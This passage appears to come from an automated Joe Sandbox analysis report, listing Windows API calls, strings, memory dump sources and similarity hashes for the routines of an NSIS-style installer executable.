                                                          • ShowWindow.USER32(00000000,?), ref: 00405740
                                                          • EnableWindow.USER32(?,?), ref: 00405752
                                                          • EnableWindow.USER32(?,?), ref: 0040576D
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405783
                                                          • EnableMenuItem.USER32(00000000), ref: 0040578A
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057A2
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057B5
                                                          • lstrlenW.KERNEL32(007C5A78,?,007C5A78,007E95E0), ref: 004057DE
                                                          • SetWindowTextW.USER32(?,007C5A78), ref: 004057F2
                                                          • ShowWindow.USER32(?,0000000A), ref: 00405926
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID: xZ|
                                                          • API String ID: 184305955-3158599731
                                                          • Opcode ID: 699d8c8571f480e4bdb3d36bb1bab13dd0e7c30a2805178f501066c7cc38f012
                                                          • Instruction ID: faf43565c4180cbf528e331297302c0a9f4643a65f382e9c74acaf045be3f04a
                                                          • Opcode Fuzzy Hash: 699d8c8571f480e4bdb3d36bb1bab13dd0e7c30a2805178f501066c7cc38f012
                                                          • Instruction Fuzzy Hash: A3C19C71401A04FFCB216F61EE89E2B3B69EB49345F40853EF642B52F0CA3A98519F1D
                                                          APIs
                                                          • lstrcpyW.KERNEL32(007D9B00,NUL), ref: 00406ABF
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00406CA6,?,?,00000001,00406EC4,?,00000000,000000F1,?), ref: 00406ADE
                                                          • GetShortPathNameW.KERNEL32(?,007D9B00,00000400), ref: 00406AE7
                                                            • Part of subcall function 00405DCC: lstrlenA.KERNEL32(00406BE9,?,00000000,00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405DDC
                                                            • Part of subcall function 00405DCC: lstrlenA.KERNEL32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E0E
                                                          • GetShortPathNameW.KERNEL32(?,007DF158,00000400), ref: 00406B08
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007D9B00,000000FF,007DA300,00000400,00000000,00000000,?,00000000,?,00406CA6,?,?,00000001,00406EC4), ref: 00406B31
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,007DF158,000000FF,007DA950,00000400,00000000,00000000,?,00000000,?,00406CA6,?,?,00000001,00406EC4), ref: 00406B49
                                                          • wsprintfA.USER32 ref: 00406B63
                                                          • GetFileSize.KERNEL32(00000000,00000000,007DF158,C0000000,00000004,007DF158,?), ref: 00406B9B
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BAA
                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BC6
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BF6
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007DAD50,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C4D
                                                            • Part of subcall function 00405E66: GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
                                                            • Part of subcall function 00405E66: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C
                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C61
                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C68
                                                          • CloseHandle.KERNEL32(?), ref: 00406C72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                          • String ID: %s=%s$NUL$[Rename]
                                                          • API String ID: 565278875-4148678300
                                                          • Opcode ID: 1114a109490fbdc9d9cd55ac8155771844d87d5164aa3d9ff1e3f2f03f1a6129
                                                          • Instruction ID: 9e8937d24cbcc237378a1661f1c9ec94e544457fac856d3cc281a3c4cf2fe410
                                                          • Opcode Fuzzy Hash: 1114a109490fbdc9d9cd55ac8155771844d87d5164aa3d9ff1e3f2f03f1a6129
                                                          • Instruction Fuzzy Hash: 80412772108209BFD6202B71DE8CD6B3A6CEF4A754B16053EF286F22D1DA389815867D
                                                          APIs
                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062EA,00000000), ref: 00406114
                                                          • GetFileAttributesW.KERNEL32(007E8D80,?,00000000,00000000,?,?,004062EA,00000000), ref: 00406152
                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000,007E8D80,40000000,00000004,?,?,004062EA,00000000), ref: 0040618B
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,007E8D80,40000000,00000004,?,?,004062EA,00000000), ref: 00406197
                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 004061B1
                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062EA,00000000), ref: 004061B8
                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,?,00000000,?,?,004062EA,00000000), ref: 004061CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                          • API String ID: 3734993849-2769509956
                                                          • Opcode ID: 53c63a071f7c75f6cc39809f4cfc821ae677a8637f79a140c0a1ee0d9f50a72e
                                                          • Instruction ID: 63b6af9be1db431a2b362d5c3b596523b37325ffd0be647115a0f8ea25bc4e05
                                                          • Opcode Fuzzy Hash: 53c63a071f7c75f6cc39809f4cfc821ae677a8637f79a140c0a1ee0d9f50a72e
                                                          • Instruction Fuzzy Hash: D921C571500244BFD7109F64DE89D9B3728EB01370B11C33AF52ABA1E1D7385D858BAC
                                                          APIs
                                                          • lstrlenW.KERNEL32(007B9A60,00427150,0041F150,00000000), ref: 00404FC0
                                                          • lstrlenW.KERNEL32(004034C5,007B9A60,00427150,0041F150,00000000), ref: 00404FD0
                                                          • lstrcatW.KERNEL32(007B9A60,004034C5), ref: 00404FE3
                                                          • SetWindowTextW.USER32(007B9A60,007B9A60), ref: 00404FF5
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040501B
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405035
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405043
                                                            • Part of subcall function 0040681B: GetVersion.KERNEL32(007B9A60,?,00000000,00404FBF,007B9A60,00000000,00427150,0041F150,00000000), ref: 004068EC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2740478559-0
                                                          • Opcode ID: 14e0322028ff1b5cf2a02c776065e56adf75eebd84e0f2ede120a82dc9a55bcd
                                                          • Instruction ID: be30987b008cdac283f352a72c5daf1bc185fc6a717e9f44ce2e47ebc7ce0ac4
                                                          • Opcode Fuzzy Hash: 14e0322028ff1b5cf2a02c776065e56adf75eebd84e0f2ede120a82dc9a55bcd
                                                          • Instruction Fuzzy Hash: BF219D71800118BBCF12AFA5DD849DEBFB8EF45350F10803AFA04B62A0D7794A50DB98
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                          • MulDiv.KERNEL32(00022600,00000064,00158B79), ref: 00403295
                                                          • wsprintfW.USER32 ref: 004032A5
                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 0927bb4ed48fc27ce86c7514204bd566bf0cfbbf84362ab54b8100dd2a89eb04
                                                          • Instruction ID: 9fbafa62008f9a5ff2b290cb2ce3c23c2df22ed1ca64675581df3bb266551b9d
                                                          • Opcode Fuzzy Hash: 0927bb4ed48fc27ce86c7514204bd566bf0cfbbf84362ab54b8100dd2a89eb04
                                                          • Instruction Fuzzy Hash: BB014470610209ABEF109F60DD59FAA3B69FB00349F00803DFA45B91E0DB7896558B58
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060B1
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060C0
                                                          • CharNextW.USER32(?,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060C5
                                                          • CharPrevW.USER32(?,?,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                          • Instruction ID: a09026506d824dbf9e13ec1e4905f02e05ac7e50fa84eba4f97cb212d859c974
                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                          • Instruction Fuzzy Hash: 6F11E71185062159DB30EB259C4097BB6F8EE99760752843FE9C6F32C0EB7C8CA1D2BD
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 0040506D
                                                            • Part of subcall function 00403DC5: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DD7
                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050BB
                                                            • Part of subcall function 004062B9: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E8F,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062C6
                                                            • Part of subcall function 004062B9: wvsprintfW.USER32(00000000,?,?), ref: 004062DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                          • API String ID: 2266616436-4211696005
                                                          • Opcode ID: 99d14f7043e79d3d8086908b3cabd6d308359c9a829abfe0eea5bc0ae8c4af9b
                                                          • Instruction ID: 72b980f80c28ecfcd0407e0dace594f9e180666c0886337011194864861aae86
                                                          • Opcode Fuzzy Hash: 99d14f7043e79d3d8086908b3cabd6d308359c9a829abfe0eea5bc0ae8c4af9b
                                                          • Instruction Fuzzy Hash: D2F0D1368246009AE2106755BD06B6A77A4DF85711F68403FFF40B22E1DF7D18418AAD
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,00403719,00000001,?,?,?,00000000,00403A5D,?), ref: 004032E5
                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A5D,?), ref: 0040332E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: ac63fb45ebae7e502b517329f215a40213becb05cb1b7459b7d9d9338ff04f82
                                                          • Instruction ID: 97d955eecb999c6cc4ecec0c264b20ab0036741e5c77e3c2fc1849182f84e521
                                                          • Opcode Fuzzy Hash: ac63fb45ebae7e502b517329f215a40213becb05cb1b7459b7d9d9338ff04f82
                                                          • Instruction Fuzzy Hash: 5BF05E30506620EBC2206FA4FE5CBAB7F68F704B82B41447EF541B12A4CB384951CBDC
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007D5AB0,Error launching installer), ref: 00405C7A
                                                          • CloseHandle.KERNEL32(?), ref: 00405C87
                                                          Strings
                                                          • Error launching installer, xrefs: 00405C5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: c30e874c0dd13dafab9eec4149781a552473f0f0671de2e9495985384250c353
                                                          • Instruction ID: e53b0d2e07ed5cc42b65f46c088a0ffbd9ee82f7db84de32081c625a94508254
                                                          • Opcode Fuzzy Hash: c30e874c0dd13dafab9eec4149781a552473f0f0671de2e9495985384250c353
                                                          • Instruction Fuzzy Hash: C9E0ECB0900219ABEB009F64DE49D7B7FBCFB40305B408526A955E2250D778D8148AA8
                                                          APIs
                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E8F,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062C6
                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062DD
                                                            • Part of subcall function 004060FD: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062EA,00000000), ref: 00406114
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                          • API String ID: 3509786178-2769509956
                                                          • Opcode ID: 7855ac2f6164c7a2629bb99e179585e0bc82677cf2e10cbf779388d075bdbb21
                                                          • Instruction ID: 2883f6fdbb75122e7c86ea7043297328e8e8306c32113c26ceb0f942655100f9
                                                          • Opcode Fuzzy Hash: 7855ac2f6164c7a2629bb99e179585e0bc82677cf2e10cbf779388d075bdbb21
                                                          • Instruction Fuzzy Hash: 1ED0523429460EAACA009BA0EE1DE1A3B79EF80304F84843EF046820B0EA389002CB0D
                                                          APIs
                                                          • lstrlenA.KERNEL32(00406BE9,?,00000000,00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405DDC
                                                          • lstrcmpiA.KERNEL32(00000000,00406BE9), ref: 00405DF4
                                                          • CharNextA.USER32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E05
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                          • Instruction ID: 154379d1c5420fb8949bca2a3232bbf94181924a40fc586370f8f53582277720
                                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
